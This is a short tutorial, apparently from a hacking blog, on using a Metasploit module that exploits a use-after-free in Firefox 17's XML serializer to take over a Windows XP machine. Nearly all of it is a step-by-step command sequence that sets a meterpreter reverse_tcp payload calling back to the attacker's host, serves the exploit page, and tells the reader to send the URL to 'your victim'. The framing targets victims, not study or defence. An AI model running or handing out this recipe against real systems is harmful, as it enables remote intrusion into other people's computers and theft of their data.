Exploit Remote Windows PC using Firefox XML Serializer Use After Free
This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.
Exploit Targets :
Windows XP SP3
Requirements:
Victim PC:Windows XP
1.Open terminal type msfconsole
2.Now type use exploit/windows/browser/ mozilla_firefox_xmlserializer
3.msf exploit (mozilla_firefox_xmlserializer)>set payload windows/meterpreter/reverse_tcp
4.msf exploit (mozilla_firefox_xmlserializer)>set lhost 192.168.1.136 (IP of Local Host)
5.msf exploit (mozilla_firefox_xmlserializer)>set srvhost 192.168.1.136 (IP of Local Host)
6.msf exploit (mozilla_firefox_xmlserializer)>set uripath /
7.msf exploit (mozilla_firefox_xmlserializer)>exploit
8.Now an URL you should give to your victim http:// 192.168.1.136:8080/